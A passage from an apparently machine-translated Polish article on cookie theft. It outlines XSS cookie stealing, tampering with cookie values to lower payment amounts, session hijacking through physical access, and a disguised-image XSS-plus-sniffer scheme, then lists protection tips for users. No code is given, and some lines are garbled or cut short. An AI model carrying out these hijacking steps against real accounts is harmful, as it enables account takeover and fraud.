  • z kolei wykonany szkodliwy kod „wyciąga” z przeglądarki poufne dane użytkownika (w szczególności pliki cookies) i wysyła je na serwer WWW osoby atakującej.

Aby „wszczepić” programowy mechanizm XSS, hakerzy wykorzystują różnego rodzaju luki w serwerach internetowych, usługach online i przeglądarkach.

Wszystkie luki XSS dzielą się na dwa typy:

  • Bierny. Atak następuje poprzez żądanie określonego skryptu na stronie internetowej. Złośliwy kod może zostać wstrzyknięty do różnych formularzy na stronie internetowej (na przykład w pasku wyszukiwania witryny). Najbardziej podatne na pasywne XSS są zasoby, które nie filtrują znaczników HTML po nadejściu danych;
  • Aktywny. Znajduje się bezpośrednio na serwerze. Są one aktywowane w przeglądarce ofiary. Są aktywnie wykorzystywane przez oszustów na wszelkiego rodzaju blogach, czatach i kanałach informacyjnych.

Hakerzy starannie „kamuflują” swoje skrypty XSS, aby ofiara niczego nie podejrzewała. Zmieniają rozszerzenie pliku, przekazują kod w postaci obrazu, motywują do kliknięcia linku i przyciągają ciekawą treścią. W rezultacie: użytkownik komputera PC, nie mogąc zapanować nad własną ciekawością, własnoręcznie (kliknięciem myszy) wysyła sesyjne pliki cookie (z loginem i hasłem!) do autora skryptu XSS – komputerowego złoczyńcy.

Zastąpienie plików cookie

Wszystkie pliki cookies są zapisywane i wysyłane na serwer WWW (z którego „pochodzą”) w stanie niezmienionym – w oryginalnej formie – z tymi samymi wartościami, ciągami znaków i innymi danymi. Świadoma modyfikacja ich parametrów nazywana jest substytucją plików cookies. Innymi słowy, podmieniając pliki cookie, atakujący udaje, że myśli pobożnie. Przykładowo podczas dokonywania płatności w sklepie internetowym plik cookie zmienia kwotę płatności w dół – w ten sposób następuje „oszczędność” na zakupach.

Skradzione sesyjne pliki cookie w sieci społecznościowej z konta innej osoby są „wstawiane” do innej sesji i na innym komputerze. Właściciel skradzionych plików cookie uzyskuje pełny dostęp do konta ofiary (korespondencja, treść, ustawienia strony), o ile znajduje się ona na swojej stronie.

„Edycja” plików cookies odbywa się za pomocą:

  • funkcje „Zarządzaj plikami cookies…” w przeglądarce Opera;
  • Dodatki do Menedżera plików cookie i Zaawansowanego menedżera plików cookie dla FireFox;
  • Narzędzia IECookiesView (tylko Internet Explorer);
  • edytor tekstu, taki jak AkelPad, NotePad lub Notatnik Windows.
Fizyczny dostęp do danych

Bardzo prosty schemat wdrożenia, składający się z kilku kroków. Ale jest skuteczny tylko wtedy, gdy komputer ofiary z otwartą sesją, na przykład VKontakte, pozostanie bez nadzoru (i to przez długi czas!):

  • W pasku adresu przeglądarki wpisana jest funkcja javascript, która wyświetla wszystkie zapisane pliki cookies.
  • Po naciśnięciu „ENTER” wszystkie pojawiają się na stronie.
  • Cookies są kopiowane, zapisywane do pliku, a następnie przenoszone na dysk flash.
  • Na innym komputerze pliki cookie są zastępowane w nowej sesji.
  • Dostęp do konta ofiary zostaje przyznany.
  • Z reguły hakerzy używają powyższych narzędzi (+ innych) zarówno w połączeniu (ponieważ poziom ochrony wielu zasobów sieciowych jest dość wysoki), jak i osobno (gdy użytkownicy są nadmiernie naiwni).

    XSS + sniffer
  • Tworzony jest skrypt XSS, który określa adres sniffera online (domowego lub określonej usługi).
  • Szkodliwy kod jest zapisywany z rozszerzeniem .img (format obrazu).
  • Plik ten jest następnie przesyłany na stronę internetową, czat lub wiadomość osobistą – gdzie zostanie przeprowadzony atak.
  • Uwagę użytkownika zwraca się na stworzoną „pułapkę” (tutaj wchodzi w grę socjotechnika).
  • Jeśli pułapka zostanie uruchomiona, pliki cookie z przeglądarki ofiary zostaną przechwycone przez sniffera.
  • Osoba atakująca otwiera dzienniki sniffera i odzyskuje skradzione pliki cookie.
  • Następnie dokonuje podmiany w celu uzyskania uprawnień właściciela konta korzystając z powyższych narzędzi.
  • Ochrona plików cookie przed włamaniem
  • Korzystaj z szyfrowanego połączenia (przy użyciu odpowiednich protokołów i metod bezpieczeństwa).
  • Nie odpowiadaj na podejrzane linki, zdjęcia lub kuszące oferty zapoznania się z „nowym bezpłatnym oprogramowaniem”. Zwłaszcza od nieznajomych.
  • Korzystaj wyłącznie z zaufanych zasobów sieciowych.
  • Zakończ autoryzowaną sesję klikając przycisk „Wyloguj” (a nie tylko zamykając kartę!). Zwłaszcza jeśli logowałeś się na swoje konto nie z komputera osobistego, ale na przykład z komputera w kafejce internetowej.
  • Nie korzystaj z funkcji „Zapisz hasło” dostępnej w przeglądarce. Przechowywane dane rejestracyjne znacznie zwiększają ryzyko kradzieży. Nie bądź leniwy, nie trać kilku minut na wpisywanie hasła i logowanie na początku każdej sesji.
  • Po surfowaniu po Internecie - odwiedzaniu sieci społecznościowych, forów, czatów, stron internetowych - usuń zapisane pliki cookie i wyczyść pamięć podręczną przeglądarki.
  • Regularnie aktualizuj przeglądarki i oprogramowanie antywirusowe.
  • Używaj rozszerzeń przeglądarki chroniących przed atakami XSS (na przykład NoScript dla FF i Google Chrome).
  • Okresowo na kontach.
  • A co najważniejsze, nie trać czujności i uwagi podczas relaksu lub pracy w Internecie!